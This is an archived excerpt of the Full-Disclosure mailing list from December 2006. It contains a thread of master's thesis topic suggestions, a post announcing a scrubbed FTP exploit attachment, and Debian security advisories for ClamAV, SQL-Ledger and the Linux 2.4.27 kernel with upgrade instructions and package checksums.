>75x+jP9FNzlE7ieAV3r7Czs=
>=DdKu
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 4
>Date: Fri, 15 Dec 2006 17:01:50 -0600 (CST)
>From: scott hollatz 
>Subject: Re: [Full-disclosure] [OOT] Thesis for master degree
>To: Fajar Edisya Putera 
>Cc: full-disclosure at lists.grok.org.uk
>Message-ID: 
>Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
> > Hello everyone, sorry for wasting your bandwidth
> >
> > I'm currently trying to find an interesting topic in computer networking
> > security for my master degree thesis, I've read a lot of jurnal that 
>related
> > with computer networking and security. All journal seem to advanced for 
>me,
> > sometimes the journal has mathematical formula that I don't understand 
>what
> > is the point for. Maybe someone here willing to help me? an idea? or 
>another
> > journal website?
>
>Networking and security *is* mathematical, don't be fooled.
>
>A quick peek at "ACM Transactions on Information and System Security"
>and "IEEE/ACM Transactions on Networking" should be a hint you need to
>understand math to do a relatively decent masters thesis.
>
>- --
>scott hollatz                                        net shollatz at d.UMn.eDu
>information technology systems and services          tel +1 218 726 8851
>university of minnesota duluth mn usa                fax +1 218 726 7674
>                                                                           
>--
>                                                "Asn aD ta zlAp em uT 
>zt33rg"
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.6 (SunOS)
>
>iD8DBQFFgylk4og1WWfEVRsRAqoeAJsEQjvD9758OFWl3hhOcoPgMX98NgCfXHuh
>ZuitIDA2auiGOhFPl9xUFfw=
>=ILTE
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 5
>Date: Fri, 15 Dec 2006 23:30:19 +0000
>From: xyberpix 
>Subject: Re: [Full-disclosure] [OOT] Thesis for master degree
>To: scott hollatz 
>Cc: full-disclosure at lists.grok.org.uk
>Message-ID: <6ACC9203-E28C-42D8-8783-CB77D24417A9 at xyberpix.com>
>Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>What about hacking ATM's, that'd make a great thesis from my side.
>Also what about in-depth research into botnets?
>
>xyberpix
>
>On 15 Dec 2006, at 23:01, scott hollatz wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> >> Hello everyone, sorry for wasting your bandwidth
> >>
> >> I'm currently trying to find an interesting topic in computer
> >> networking
> >> security for my master degree thesis, I've read a lot of jurnal
> >> that related
> >> with computer networking and security. All journal seem to
> >> advanced for me,
> >> sometimes the journal has mathematical formula that I don't
> >> understand what
> >> is the point for. Maybe someone here willing to help me? an idea?
> >> or another
> >> journal website?
> >
> > Networking and security *is* mathematical, don't be fooled.
> >
> > A quick peek at "ACM Transactions on Information and System Security"
> > and "IEEE/ACM Transactions on Networking" should be a hint you need to
> > understand math to do a relatively decent masters thesis.
> >
> > - --
> > scott hollatz                                        net
> > shollatz at d.UMn.eDu
> > information technology systems and services          tel +1 218 726
> > 8851
> > university of minnesota duluth mn usa                fax +1 218 726
> > 7674
> >
> >     --
> >                                                "Asn aD ta zlAp em
> > uT zt33rg"
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.6 (SunOS)
> >
> > iD8DBQFFgylk4og1WWfEVRsRAqoeAJsEQjvD9758OFWl3hhOcoPgMX98NgCfXHuh
> > ZuitIDA2auiGOhFPl9xUFfw=
> > =ILTE
> > -----END PGP SIGNATURE-----
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.5 (Darwin)
>
>iD8DBQFFgzAMt+Si58vRtJARAqpBAKCfgFJVAmrKNKqf0v0prg2YbupjfACgo1g1
>hylhuBgjFPhJ0QYXoS1XMXs=
>=DWHp
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 6
>Date: Fri, 15 Dec 2006 16:16:50 -0800
>From: "Bill Stout" 
>Subject: Re: [Full-disclosure] [OOT] Thesis for master degree
>To: 
>Message-ID:
>	<1FA45C2E5F2E4B46967415DA3A804FE88125D9 at mail.greenborder.com>
>Content-Type: text/plain; charset="us-ascii"
>
>Here are a few ideas:
>
>
>
>- The threat of rogue Virtual machines - the inside man
>
>- Disassembling Vista Security
>
>- Investigating organized computer crime
>
>- The mythical network perimeter
>
>- Data flow analysis of confidential information within corporations
>
>- Distribution and access of personal data
>
>
>
>Just suggestions, but your thesis should be of a topic which is a
>passion for you and holds your interest.  Your thesis topic may affect
>your next few years of employment, so invest in something that will be
>around for awhile (don't write about a technology approaching end of
>life).
>
>
>
>Bill Stout
>
>
>
>________________________________
>
>From: full-disclosure-bounces at lists.grok.org.uk
>[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Fajar
>Edisya Putera
>Sent: Friday, December 15, 2006 1:45 AM
>To: full-disclosure at lists.grok.org.uk
>Subject: [Full-disclosure] [OOT] Thesis for master degree
>
>
>
>Hello everyone, sorry for wasting your bandwidth
>
>I'm currently trying to find an interesting topic in computer networking
>security for my master degree thesis, I've read a lot of jurnal that
>related with computer networking and security. All journal seem to
>advanced for me, sometimes the journal has mathematical formula that I
>don't understand what is the point for. Maybe someone here willing to
>help me? an idea? or another journal website?
>
>Thanks
>Sincerely yours
>Fajar
>
>-------------- next part --------------
>An HTML attachment was scrubbed...
>URL: 
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061215/fa897403/attachment-0001.html
>
>------------------------------
>
>Message: 7
>Date: Sat, 16 Dec 2006 05:27:13 +0100
>From: "kcope" 
>Subject: [Full-disclosure] ftpd ld.so.preload fun
>To: full-disclosure at lists.grok.org.uk
>Message-ID: <20061216042713.235360 at gmx.net>
>Content-Type: text/plain; charset="iso-8859-1"
>
>Hello this is kingcope,
>attached is an example exploit
>
>
>--
>"Ein Herz f?r Kinder" - Ihre Spende hilft! Aktion: www.deutschlandsegelt.de
>Unser Dankesch?n: Ihr Name auf dem Segel der 1. deutschen America's 
>Cup-Yacht!
>-------------- next part --------------
>A non-text attachment was scrubbed...
>Name: ftpd-ldpreload.pl
>Type: application/octet-stream
>Size: 2733 bytes
>Desc: not available
>Url : 
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061216/91666f7f/attachment-0001.obj
>
>------------------------------
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>End of Full-Disclosure Digest, Vol 22, Issue 27
>***********************************************

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar - get it now! 
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/



From jmm at debian.org  Sun Dec 17 15:05:33 2006
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Sun, 17 Dec 2006 16:05:33 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1238-1] New clamav packages fix
	several vulnerabilities
Message-ID: <20061217150533.GA4600@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1238-1                    security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
December 17th, 2006                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : clamav
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-6406 CVE-2006-6481

Several remote vulnerabilities have been discovered in the Clam anti-virus
toolkit. The Common Vulnerabilities and Exposures project identifies the
following problems:

CVE-2006-6406

    Hendrik Weimer discovered that invalid characters in base64 encoded
    data may lead to bypass of scanning mechanisms.

CVE-2006-6481

    Hendrik Weimer discovered that deeply nested multipart/mime MIME
    data may lead to denial of service.

For the stable distribution (sarge) these problems have been fixed in
version 0.84-2.sarge.13.

For the upcoming stable distribution (etch) these problems have been
fixed in version 0.88.7-1.

For the unstable distribution (sid) these problems have been fixed in
version 0.88.7-1.

We recommend that you upgrade your clamav packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.13.dsc
      Size/MD5 checksum:      874 a99fd16ec6cd3597495d66c43d86b085
    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.13.diff.gz
      Size/MD5 checksum:   180118 96f6c6b906aeeb954ab2c87551d2c603
    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84.orig.tar.gz
      Size/MD5 checksum:  4006624 c43213da01d510faf117daa9a4d5326c

  Architecture independent components:

    http://security.debian.org/pool/updates/main/c/clamav/clamav-base_0.84-2.sarge.13_all.deb
      Size/MD5 checksum:   155278 724ad22ce36c7ead6c7f4712bb5f0ff3
    http://security.debian.org/pool/updates/main/c/clamav/clamav-docs_0.84-2.sarge.13_all.deb
      Size/MD5 checksum:   694788 e78c2d70bd21ab4825f7bd094b7cf28f
    http://security.debian.org/pool/updates/main/c/clamav/clamav-testfiles_0.84-2.sarge.13_all.deb
      Size/MD5 checksum:   124236 83e7462649f84e9de615de7fb6eb2b54

  Alpha architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.13_alpha.deb
      Size/MD5 checksum:    74850 2adf16cf2156a1e61727e44e7edb90a6
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.13_alpha.deb
      Size/MD5 checksum:    48904 780b33e72cc97613d1918ac5fc87469f
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.13_alpha.deb
      Size/MD5 checksum:  2176490 0cbec86ecd122fcb6546cae48b1a5c61
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.13_alpha.deb
      Size/MD5 checksum:    42158 36ab068c44e0ac1f287e48241607edc0
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.13_alpha.deb
      Size/MD5 checksum:   256080 60bde0f909bf70949b7f0be8226e8f4b
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.13_alpha.deb
      Size/MD5 checksum:   286276 fbbfd2962447273cb529dc2688e25777

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.13_amd64.deb
      Size/MD5 checksum:    69004 66dac7905120712f0477ec01f2f13139
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.13_amd64.deb
      Size/MD5 checksum:    44270 2b6022acfbaa3f4b361d45a655ee1cf7
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.13_amd64.deb
      Size/MD5 checksum:  2173284 a1580fd5035949d97b7ea5a27665d55e
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.13_amd64.deb
      Size/MD5 checksum:    40044 7b9102d5923f62a9ab12dc42a3efbd45
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.13_amd64.deb
      Size/MD5 checksum:   176794 cea39de4522486ee111e8a2b0bc28ce6
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.13_amd64.deb
      Size/MD5 checksum:   260382 9cb209b8272e4d47ff6ea75a531005ed

  ARM architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.13_arm.deb
      Size/MD5 checksum:    63972 f3f8425d3e3a8a827f93ef6d03f336bd
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.13_arm.deb
      Size/MD5 checksum:    39632 ea7b6f705443aad934203b51e56cb755
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.13_arm.deb
      Size/MD5 checksum:  2171284 30d825ee4d9d89116ec548b7051373bf
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.13_arm.deb
      Size/MD5 checksum:    37310 379d788641b4310f7a8739f80ab938dd
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.13_arm.deb
      Size/MD5 checksum:   175126 67474b7ba1f31f3b4e9d9f9a522ae285
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.13_arm.deb
      Size/MD5 checksum:   250262 d5e8dc0f1ea852bbf77e2d1d6b8bed15

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.13_hppa.deb
      Size/MD5 checksum:    68464 add625fd31acfb07e8e34cc618e7a954
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.13_hppa.deb
      Size/MD5 checksum:    43276 7a2b981580012ab2afe3b7b6292b2138
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.13_hppa.deb
      Size/MD5 checksum:  2173680 45427c3f7cc4d7595ae5ef6b238e8baf
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.13_hppa.deb
      Size/MD5 checksum:    39532 6517f856a1df38af75dc57e54d5d7a2b
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.13_hppa.deb
      Size/MD5 checksum:   202876 dc3643365832834b72cfa24fb7c08a32
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.13_hppa.deb
      Size/MD5 checksum:   283936 4c159ec7e0603185a97b0f5d62099722

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.13_i386.deb
      Size/MD5 checksum:    65324 c460a3ba33fcee90c9f3c91685938b32
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.13_i386.deb
      Size/MD5 checksum:    40370 ce8929f2ddc2228cec2a2fea5550d38a
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.13_i386.deb
      Size/MD5 checksum:  2171606 e2fa7b2fe19f04a66770bc606c39e919
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.13_i386.deb
      Size/MD5 checksum:    38078 81b6c522ebc4461b4b3dd5da0401fe68
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.13_i386.deb
      Size/MD5 checksum:   159904 2a6ee4c7a6e0b3532160d02e10643d57
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.13_i386.deb
      Size/MD5 checksum:   255048 4f53bc2e71a80762da1e82bff4117126

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.13_ia64.deb
      Size/MD5 checksum:    81950 ad4f8ccb2156b94629e82b943ed4a64b
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.13_ia64.deb
      Size/MD5 checksum:    55328 364279da2de3f7e0b8ad038a4733a60f
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.13_ia64.deb
      Size/MD5 checksum:  2180240 d80fc692c03cd3625b5523d98d883cd9
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.13_ia64.deb
      Size/MD5 checksum:    49236 a19e0a591503b344c54d810240dcb7de
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.13_ia64.deb
      Size/MD5 checksum:   252416 c3356dbe5e216f0871e24b42d787b604
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.13_ia64.deb
      Size/MD5 checksum:   318464 70a50bf5275e4ab303221d5ab707ed3d

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.13_m68k.deb
      Size/MD5 checksum:    62644 eb91d128b88ee9f952ec65ae1dee94e7
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.13_m68k.deb
      Size/MD5 checksum:    38238 4095d78fa120345f8d9cd04cd22e91c7
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.13_m68k.deb
      Size/MD5 checksum:  2170518 6e596aac7e604c88158e35e4a155a1e9
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.13_m68k.deb
      Size/MD5 checksum:    35126 e1dda3f1c1fe43cd06a4affb298bc16f
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.13_m68k.deb
      Size/MD5 checksum:   146488 4b14d5f0afbc4f780c2cead6adc4a3cc
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.13_m68k.deb
      Size/MD5 checksum:   251092 25300915476312b18df3ede8f79eaf30

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.13_mips.deb
      Size/MD5 checksum:    68070 cc8aab5ab0b1f459199c00a31fc56ad9
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.13_mips.deb
      Size/MD5 checksum:    43870 119cd5b965a6805fdce5cd90be28de22
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.13_mips.deb
      Size/MD5 checksum:  2173046 cf4b60a4d4570633519c079801a20b78
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.13_mips.deb
      Size/MD5 checksum:    37692 d492230af98b42b38ac566c640389862
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.13_mips.deb
      Size/MD5 checksum:   195822 fccf06425fae800f841a90d78d8e5120
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.13_mips.deb
      Size/MD5 checksum:   258168 c7051b8409be63e68bddf81d9a28f0bb

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.13_mipsel.deb
      Size/MD5 checksum:    67636 0f5c8fae1b340cde8a45b4c4067d508d
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.13_mipsel.deb
      Size/MD5 checksum:    43690 c6645db26897d97cb36923fe189d5313
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.13_mipsel.deb
      Size/MD5 checksum:  2173010 c18740033f8fb8c47febb70dffddf954
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.13_mipsel.deb
      Size/MD5 checksum:    37998 d9108727e4db76d14bed80edbf1a3c97
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.13_mipsel.deb
      Size/MD5 checksum:   192216 e2783d04fd553879590271135fa6734d
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.13_mipsel.deb
      Size/MD5 checksum:   255744 b833681a0f74d286497f7b5368994514

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.13_powerpc.deb
      Size/MD5 checksum:    69382 e48f231bee41d3065ac1622eccdba9e0
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.13_powerpc.deb
      Size/MD5 checksum:    44720 0f3a2c415fb4e7a658d3a58bfac9e890
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.13_powerpc.deb
      Size/MD5 checksum:  2173682 4ea34d9279e37e70a4201e05371fca95
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.13_powerpc.deb
      Size/MD5 checksum:    38894 d249f17fb9c157ad16f9a426ffcc8bfa
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.13_powerpc.deb
      Size/MD5 checksum:   187854 cb0f4a9b4545e3f220389a12513b15db
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.13_powerpc.deb
      Size/MD5 checksum:   265516 853da016b2f5b75fcd06a5fed93de5d6

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.13_s390.deb
      Size/MD5 checksum:    67960 9cfa237a0ddf2f2b84a838873fa3a9dd
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.13_s390.deb
      Size/MD5 checksum:    43632 7cd6aa86a4ab193dc66ee60a973ccf15
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.13_s390.deb
      Size/MD5 checksum:  2172960 5e7305b7adfeeac716498952221d146f
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.13_s390.deb
      Size/MD5 checksum:    38958 68bfab24f52fcbaa1d72538b17b80f12
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.13_s390.deb
      Size/MD5 checksum:   182860 8d0a959fb80bd90333dbbd92f3f8ac76
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.13_s390.deb
      Size/MD5 checksum:   270098 be6fc3cf76e1c0a9dad4eebb5ad64fee

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.13_sparc.deb
      Size/MD5 checksum:    64750 bbd81902e382538eef10d7f817d511af
    http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.13_sparc.deb
      Size/MD5 checksum:    39532 6ac663f32d7d66bf600d4f0c5df11d03
    http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.13_sparc.deb
      Size/MD5 checksum:  2171186 fd6946cfe666a43c81f4f2b27aab0f98
    http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.13_sparc.deb
      Size/MD5 checksum:    36890 b5b69baf1990e8b6cdf215910fbbd363
    http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.13_sparc.deb
      Size/MD5 checksum:   176104 b852e63365117f5252bd75b7a1ab3be6
    http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.13_sparc.deb
      Size/MD5 checksum:   265496 92b0efec94e02481cc9b1eb23a074a6a


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFhVyQXm3vHE4uyloRAuPRAKCZWfnhSXclLRFMn7C8WrKnFwqmsgCgxRQ/
Y/B3l3uywbra52tc/hO91B0=
=Vs3L
-----END PGP SIGNATURE-----



From jmm at debian.org  Sun Dec 17 15:21:18 2006
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Sun, 17 Dec 2006 16:21:18 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1239-1] New sql-ledger packages
	fix arbitrary code execution
Message-ID: <20061217152118.GA4707@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1239-1                    security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
December 17th, 2006                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : sql-ledger
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-4244 CVE-2006-4731 CVE-2006-5872
Debian Bug     : 386519

Several remote vulnerabilities have been discovered in SQL Ledger, a web
based double-entry accounting program, which may lead to the execution
of arbitrary code. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2006-4244

    Chris Travers discovered that the session management can be tricked
    into hijacking existing sessions.

CVE-2006-4731

    Chris Travers discovered that directory traversal vulnerabilities
    can be exploited to execute arbitrary Perl code.

CVE-2006-5872

    It was discovered that missing input sanitising allows execution of
    arbitrary Perl code.

For the stable distribution (sarge) these problems have been fixed in
version 2.4.7-2sarge1.

For the upcoming stable distribution (etch) these problems have been
fixed in version 2.6.21-1.

For the unstable distribution (sid) these problems have been fixed in
version 2.6.21-1.

We recommend that you upgrade your sql-ledger packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/s/sql-ledger/sql-ledger_2.4.7-2sarge1.dsc
      Size/MD5 checksum:      655 0392c058e58df7deca105cddb2b40ca5
    http://security.debian.org/pool/updates/main/s/sql-ledger/sql-ledger_2.4.7-2sarge1.diff.gz
      Size/MD5 checksum:    18423 45d1d70cfa3c385bf74b38bcccbe584c
    http://security.debian.org/pool/updates/main/s/sql-ledger/sql-ledger_2.4.7.orig.tar.gz
      Size/MD5 checksum:  1695610 04c9ffe49045cad569c5a368d7ebaa76

  Architecture independent components:

    http://security.debian.org/pool/updates/main/s/sql-ledger/sql-ledger_2.4.7-2sarge1_all.deb
      Size/MD5 checksum:  1796848 9cd9a4cf9057efc57384fe952bf4751f


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFhWA2Xm3vHE4uyloRAt83AKDJuWn50PHVlHM1WC/yM6+zQChv5QCeLXiS
vBljQqpvtbNrN4FJMnQjvak=
=Z3Eb
-----END PGP SIGNATURE-----



From fajarep at gmail.com  Sun Dec 17 16:17:11 2006
From: fajarep at gmail.com (Fajar Edisya Putera)
Date: Sun, 17 Dec 2006 23:17:11 +0700
Subject: [Full-disclosure] [OOT] Thesis for master degree
In-Reply-To: <002e01c7213b$6cdabc90$0200a8c0@AMD2500>
References: <1FA45C2E5F2E4B46967415DA3A804FE88125D9@mail.greenborder.com>
	<002e01c7213b$6cdabc90$0200a8c0@AMD2500>
Message-ID: <828af05c0612170817w7af3be70kb452d6864f6531c3@mail.gmail.com>

thanks all for the hint. phew, i hope i can do my thesis very soon. daily
job as system  and network administrator really take my day.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061217/1fbd553d/attachment.html 

From dannf at debian.org  Sun Dec 17 14:07:46 2006
From: dannf at debian.org (Dann Frazier)
Date: Sun, 17 Dec 2006 15:07:46 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1237-1] New Linux 2.4.27 packages
	fix several vulnerabilities
Message-ID: <20061217140746.GA3845@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1237-1                    security at debian.org
http://www.debian.org/security/                               Dann Frazier
December 17th, 2006                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : kernel-source-2.4.27
Vulnerability  : several
Problem-Type   : local/remote
Debian-specific: no
CVE ID         : CVE-2006-4093 CVE-2006-4538 CVE-2006-4997 CVE-2006-5174
                 CVE-2006-5649 CVE-2006-5871
                 

Several local and remote vulnerabilities have been discovered in the Linux
kernel that may lead to a denial of service or the execution of arbitrary
code. The Common Vulnerabilities and Exposures project identifies the
following problems:

CVE-2005-4093

    Olof Johansson reported a local DoS (Denial of Service) vulnerability
    on the PPC970 platform. Unpriveleged users can hang the system by
    executing the "attn" instruction, which was not being disabled at boot.

CVE-2006-4538

    Kirill Korotaev reported a local DoS (Denial of Service) vulnerability
    on the ia64 and sparc architectures. A user could cause the system to
    crash by executing a malformed ELF binary due to insufficient verification
    of the memory layout.

CVE-2006-4997

    ADLab Venustech Info Ltd reported a potential remote DoS (Denial of
    Service) vulnerability in the IP over ATM subsystem. A remote system
    could cause the system to crash by sending specially crafted packets
    that would trigger an attempt to free an already-freed pointer
    resulting in a system crash.

CVE-2006-5174

    Martin Schwidefsky reported a potential leak of sensitive information
    on s390 systems. The copy_from_user function did not clear the remaining
    bytes of the kernel buffer after receiving a fault on the userspace
    address, resulting in a leak of uninitialized kernel memory. A local user
    could exploit this by appending to a file from a bad address.

CVE-2006-5649

    Fabio Massimo Di Nitto reported a potential remote DoS (Denial of Service)
    vulnerability on powerpc systems.  The alignment exception only
    checked the exception table for -EFAULT, not for other errors. This can
    be exploited by a local user to cause a system crash (panic).

CVE-2006-5871

    Bill Allombert reported that various mount options are ignored by smbfs
    when UNIX extensions are enabled. This includes the uid, gid and mode
    options. Client systems would silently use the server-provided settings
    instead of honoring these options, changing the security model. This
    update includes a fix from Haroldo Gamal that forces the kernel to honor
    these mount options. Note that, since the current versions of smbmount
    always pass values for these options to the kernel, it is not currently
    possible to activate unix extensions by omitting mount options. However,
    this behavior is currently consistent with the current behavior of the
    next Debian release, 'etch'.

The following matrix explains which kernel version for which architecture
fix the problems mentioned above:

                                 Debian 3.1 (sarge)
     Source                      2.4.27-10sarge5
     Alpha architecture          2.4.27-10sarge5
     ARM architecture            2.4.27-2sarge5
     Intel IA-32 architecture    2.4.27-10sarge5
     Intel IA-64 architecture    2.4.27-10sarge5
